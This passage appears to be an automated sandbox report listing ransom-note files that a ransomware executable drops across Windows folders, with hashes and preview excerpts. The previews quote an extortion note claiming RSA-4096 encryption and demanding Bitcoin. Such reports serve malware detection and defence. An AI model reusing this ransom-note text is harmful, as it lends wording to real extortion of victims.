                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Sqm\Upload\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Sqm\Upload\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Sqm\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Sqm\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Sqm\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu Places\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu Places\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Start Menu Places\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):102128
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:6E4A9B603AC71B0AA51BB04B9D83190F
                  SHA1:7EC4D9E309FBB9A9232CA5EF59ABB6EC37B81CC8
                  SHA-256:8272D8BC8F3E59E4DBB5DC77583E0E4E40325738A874C3F1C5D3A628F2426FE4
                  SHA-512:FDE31D60F3B7CCCA0789897E54327C98F892D76BC54CFBFAC3F87F318D30B1965773297D9E6FAB3905365A46F55AF60A25799F4B03DEE2D7291DE164A5FF922C
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):880776
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZC2
                  MD5:341F40B399F00E0AF5A4BEADF32B7120
                  SHA1:5E01494DE1ED990345DF9F24FA97EABF4C33D983
                  SHA-256:CDC9EE3DAC4DB6754A8B0CC93262448F8A96504B6DFA23E839114ADF1746CC5D
                  SHA-512:A7009D5D924E56ADBDCA7C82211BC54C3B48EF882E7C51CD09BEE0A192F9E3EDB23056651C1EE85A561B4F1981FCDC8036BBD45237558F7B059DD6E4282BAAAC
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):27261
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:96A14B1FF2E7F26DBAEBDDCEAE2FC7E8
                  SHA1:6D12C7359E07920E05F48DBA2234925A44C97002
                  SHA-256:58BE62FFFC31F50B7A8A7FAF3BDFAFD99669A10E6C0C6FF94AB4B5B63513B802
                  SHA-512:D43E760284A353B8AFE0246DCEC288C08CCEA3BEF248195DCBB8104BADB5DCD8C13EB4F5CF413EA9A13F83682A60D7931F8E9C53642A8E3F7719C3F27E31ECF0
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):102128
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:6E4A9B603AC71B0AA51BB04B9D83190F
                  SHA1:7EC4D9E309FBB9A9232CA5EF59ABB6EC37B81CC8
                  SHA-256:8272D8BC8F3E59E4DBB5DC77583E0E4E40325738A874C3F1C5D3A628F2426FE4
                  SHA-512:FDE31D60F3B7CCCA0789897E54327C98F892D76BC54CFBFAC3F87F318D30B1965773297D9E6FAB3905365A46F55AF60A25799F4B03DEE2D7291DE164A5FF922C
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):880776
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZC2
                  MD5:341F40B399F00E0AF5A4BEADF32B7120
                  SHA1:5E01494DE1ED990345DF9F24FA97EABF4C33D983
                  SHA-256:CDC9EE3DAC4DB6754A8B0CC93262448F8A96504B6DFA23E839114ADF1746CC5D
                  SHA-512:A7009D5D924E56ADBDCA7C82211BC54C3B48EF882E7C51CD09BEE0A192F9E3EDB23056651C1EE85A561B4F1981FCDC8036BBD45237558F7B059DD6E4282BAAAC
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):27261
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:96A14B1FF2E7F26DBAEBDDCEAE2FC7E8
                  SHA1:6D12C7359E07920E05F48DBA2234925A44C97002
                  SHA-256:58BE62FFFC31F50B7A8A7FAF3BDFAFD99669A10E6C0C6FF94AB4B5B63513B802
                  SHA-512:D43E760284A353B8AFE0246DCEC288C08CCEA3BEF248195DCBB8104BADB5DCD8C13EB4F5CF413EA9A13F83682A60D7931F8E9C53642A8E3F7719C3F27E31ECF0
                  Malicious:false
